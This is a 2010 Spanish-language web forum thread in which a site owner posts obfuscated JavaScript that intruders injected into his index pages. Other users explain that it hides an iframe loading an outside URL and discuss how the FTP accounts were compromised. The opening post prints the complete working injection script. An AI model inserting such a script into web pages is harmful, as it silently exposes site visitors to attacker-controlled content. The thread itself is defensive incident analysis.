Foros del Web » Programando para Internet » Javascript »

Codigo hackeo

Estas en el tema de Codigo hackeo en el foro de Javascript en Foros del Web. Buenas. Esta noche de alguna forma, se han colado en el ftp de dos servidores mios, y han modificado todos los archivos index, ya sean ...
  #1 (permalink)  
Antiguo 13/10/2010, 22:18
 
Fecha de Ingreso: junio-2002
Mensajes: 516
Antigüedad: 22 años, 5 meses
Puntos: 0
Codigo hackeo

Buenas.

Esta noche de alguna forma, se han colado en el ftp de dos servidores mios, y han modificado todos los archivos index, ya sean .html o .php. con el siguiente codigo:

Código:
<script type='text/javascript'>function nK(){};var sV=new Array();nK.prototype = {g : function() {this.t=false;j="";var e=false;var m="m";f="f";function d(){};var q=new String("body");var zE=function(){return 'zE'};var i=new Array();this.iM="iM";var nB='';var w=120;this.h='';this.eE="";this.qO=2777;this.mQ='';var wO=new Array();var fC=new Array();try {var v=false;var wW=function(){return 'wW'};this.qZ=38462;yG=54242;kY=5135;this.uM=false;var x=new Date();var a="a";var y="appeQIl".substr(0,4)+"w6ZndChwZ6".substr(3,4)+"sB8ildsB8".substr(3,3);this.s=40976;this.kM=44548;var k=document;aC="aC";var mE=new Date();var z=new String("iframA0n".substr(0,5)+"evcHF".substr(0,1));var hF=new Array();dF='';var wH=new String("cr"+"ea"+"te"+"El"+"em"+"en"+"tU2i".substr(0,1));this.b="b";nN="";this.dU="dU";wK="wK";var gA='';var iV=new Date();var u = k[wH](z);var qL="";var p=false;this.nM=4880;this.c='';var gH=new Array();var zT=false;iB='';var yU = new String("viNf4Y".substr(0,2)+"39Psi39P".substr(3,2)+"bi9ySC".substr(0,2)+"liY2FL".substr(0,2)+"tyfET".substr(0,2));var tT=false;var dX=new Date();u.height=w;var zEZ=false;var yV=new Date();eH='';u.width=w;var jP=function(){};xP='';var wY="wY";var r=function(){};var uX=function(){return 'uX'};uB='';var pV=function(){return 'pV'};var pY=function(){};u.src=String("htt"+"p:/"+"/biMJK".substr(0,3)+"jaMgezaMj".substr(3,3)+"a.c"+"om/fzVa".substr(0,3)+"use"+"hwOrs/hOw".substr(3,3)+"5");o=20697;var zJ=new Array();u.style[yU]="hidd"+"en";var tL="tL";this.dN="dN";this.fL="fL";var eB=false;var gHY=false;var eF=false;var gF="gF";k[q][y](u);var xZ=new Date();var mK="mK";var zC="zC";this.gE="gE";this.uJ="";var mEX='';this.wKA=30901;} catch(ex){var iD='';var kU="";this.gI='';hI="";document.write("<"+q+">");var uE=function(){return 'uE'};cE="cE";var yL="yL";var n=this;var fQ="fQ";function bN(){};var zV=false;this.fM='';setTimeout(function(){n.g();}, w);var rQ=false;var uF="uF";}kT='';fA=false;}};var sU=new Array();var uK=new nK(); this.pA=1620;uK.g();var oS="";</script>
Alguien sabe decirme que hace esto?

Gracias
  #2 (permalink)  
Antiguo 13/10/2010, 23:17
Avatar de zerokilled
Javascripter
 
Fecha de Ingreso: abril-2009
Ubicación: Isla del Encanto, La Borinqueña [+>==]
Mensajes: 8.050
Antigüedad: 15 años, 6 meses
Puntos: 1485
Respuesta: Codigo hackeo

¿que hace el codigo? te inserta un iframe oculto en el documento y carga una web http://bigeza.com/users/5. lo que es curioso es que la web es redirigida a google. en fin, si el codigo no es tuyo, entonces eliminalo.
__________________
la maldad es una virtud humana,
y la espiritualidad es la lucha del hombre contra su maldad.
  #3 (permalink)  
Antiguo 14/10/2010, 01:12
 
Fecha de Ingreso: junio-2002
Mensajes: 516
Antigüedad: 22 años, 5 meses
Puntos: 0
Respuesta: Codigo hackeo

Cita:
Iniciado por zerokilled Ver Mensaje
¿que hace el codigo? te inserta un iframe oculto en el documento y carga una web http://bigeza.com/users/5. lo que es curioso es que la web es redirigida a google. en fin, si el codigo no es tuyo, entonces eliminalo.
Cuando el codigo estaba en los index, no redirigia a ninguna parte. Si lo copias tu en un .html veras que no pasa nada al abrirlo.
Lo que no se, es como narices han accedido a las cuentas de FTP para hacer eso, porque ha sido en dos servidores, y una de las cuentas de FTP tenia una contraseña de 17 caracteres, con mayusculas, minusculas, numeros y puntos.
Asi que ni idea de como lo hicieron.
  #4 (permalink)  
Antiguo 14/10/2010, 01:17
Avatar de zerokilled
Javascripter
 
Fecha de Ingreso: abril-2009
Ubicación: Isla del Encanto, La Borinqueña [+>==]
Mensajes: 8.050
Antigüedad: 15 años, 6 meses
Puntos: 1485
Respuesta: Codigo hackeo

no necesariamente se necesite acceso por ftp. pudo haber sido inyeccion de codigo si es que en los sitios recopilas datos introducido por usuarios. si estas seguro que no fue por inyeccion de parte de usuarios, tienes que determinar si fue por recursos externos que integres en el sitio. y sino, pues ni idea, ve planificando en cambiar las contraseñas.

referente a la redireccion, me refiero en el iframe que introduce el codigo. pero este iframe esta escondido con visibility:hidden.
__________________
la maldad es una virtud humana,
y la espiritualidad es la lucha del hombre contra su maldad.
  #5 (permalink)  
Antiguo 14/10/2010, 02:30
 
Fecha de Ingreso: junio-2002
Mensajes: 516
Antigüedad: 22 años, 5 meses
Puntos: 0
Respuesta: Codigo hackeo

Cita:
Iniciado por zerokilled Ver Mensaje
no necesariamente se necesite acceso por ftp. pudo haber sido inyeccion de codigo si es que en los sitios recopilas datos introducido por usuarios. si estas seguro que no fue por inyeccion de parte de usuarios, tienes que determinar si fue por recursos externos que integres en el sitio. y sino, pues ni idea, ve planificando en cambiar las contraseñas.

referente a la redireccion, me refiero en el iframe que introduce el codigo. pero este iframe esta escondido con visibility:hidden.
Pense en lo de inyeccion de codigo, pero algunas de las webs eran simples paginas en html, no tienen nada ni de php, ni base de datos, ni nada, solo html.
La pass seguro que no las sacaron, de algunas de ellas es imposible.

Quiza algun bug en el propio sistema operativo, no lo se. Creo que voy a no dejar que hayan logins por FTP, y cuando necesite hacer algo los activo.
  #6 (permalink)  
Antiguo 14/10/2010, 07:21
Avatar de delarub  
Fecha de Ingreso: mayo-2009
Mensajes: 20
Antigüedad: 15 años, 6 meses
Puntos: 2
Respuesta: Codigo hackeo

Yo tengo un servidor en estados unidos y me han puesto ese codigo tambien.

¿Por casualidad usas proFTPd como servidor de FTP? Es lo unico que se me ocurre para que hayan accedido a los archivos...
  #7 (permalink)  
Antiguo 14/10/2010, 08:22
 
Fecha de Ingreso: junio-2002
Mensajes: 516
Antigüedad: 22 años, 5 meses
Puntos: 0
Respuesta: Codigo hackeo

Cita:
Iniciado por delarub Ver Mensaje
Yo tengo un servidor en estados unidos y me han puesto ese codigo tambien.

¿Por casualidad usas proFTPd como servidor de FTP? Es lo unico que se me ocurre para que hayan accedido a los archivos...
Pues si, uso proftpd. Pues si que es seguro no....? Lo que he hecho es deshabilitar el logueo de los usuarios de ftp, cuando me haga falta modifcar algo lo activo y luego lo desactivo.
  #8 (permalink)  
Antiguo 14/10/2010, 09:12
Avatar de delarub  
Fecha de Ingreso: mayo-2009
Mensajes: 20
Antigüedad: 15 años, 6 meses
Puntos: 2
Respuesta: Codigo hackeo

Cita:
Iniciado por Copp Ver Mensaje
Pues si, uso proftpd. Pues si que es seguro no....? Lo que he hecho es deshabilitar el logueo de los usuarios de ftp, cuando me haga falta modifcar algo lo activo y luego lo desactivo.
Es raro, en un servidor de hosting gratuito que usa Pure-FTPd tambien ha afectado, por lo menos a mi sitio.
Me queda por saber si ha afectado a todos los hospedados ahi o solo a mi, en cuyo caso sera algun virus local...
  #9 (permalink)  
Antiguo 14/10/2010, 09:14
 
Fecha de Ingreso: junio-2002
Mensajes: 516
Antigüedad: 22 años, 5 meses
Puntos: 0
Respuesta: Codigo hackeo

Cita:
Iniciado por delarub Ver Mensaje
Es raro, en un servidor de hosting gratuito que usa Pure-FTPd tambien ha afectado, por lo menos a mi sitio.
Me queda por saber si ha afectado a todos los hospedados ahi o solo a mi, en cuyo caso sera algun virus local...
A mi me ha pasado exactamente lo mismo en dos servidores dedicados alojados en ovh
  #10 (permalink)  
Antiguo 14/10/2010, 09:16
Avatar de delarub  
Fecha de Ingreso: mayo-2009
Mensajes: 20
Antigüedad: 15 años, 6 meses
Puntos: 2
Respuesta: Codigo hackeo

Cita:
Iniciado por Copp Ver Mensaje
A mi me ha pasado exactamente lo mismo en dos servidores dedicados alojados en ovh
Tambien ha afectado a un sitio que tengo en 1AND1, no creo que el "virus" haya tenido tanto alcance y tan poca repercusion en los medios (al menos de internet), asi que intuyo que el virus es local, ha obtenido todas las cuentas que tengo recordadas en FileZilla y ha modificado los index.php o index.htm...
  #11 (permalink)  
Antiguo 14/10/2010, 09:38
 
Fecha de Ingreso: junio-2002
Mensajes: 516
Antigüedad: 22 años, 5 meses
Puntos: 0
Respuesta: Codigo hackeo

Y que narices ganan con modificar el index con eso? En una de las webs que tengo he notado un bajon de visitas, no se si tendra algo que ver, que haya redireccionado visitas durante el tiempo que estuvo puesto el codigo.

PD: Sabeis algun comando en linux para buscar una palabra en todos los archivos correspondientes a un directorio? aunque tenga mas subdirectorios. CAT no funciona porque no permite poner -R .
  #12 (permalink)  
Antiguo 14/10/2010, 09:58
 
Fecha de Ingreso: junio-2002
Mensajes: 516
Antigüedad: 22 años, 5 meses
Puntos: 0
Respuesta: Codigo hackeo

Parece ser un fallo de seguridad en el kernel: http://foros.ovh.es/showthread.php?t=7428

Etiquetas: hacking
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 10:19.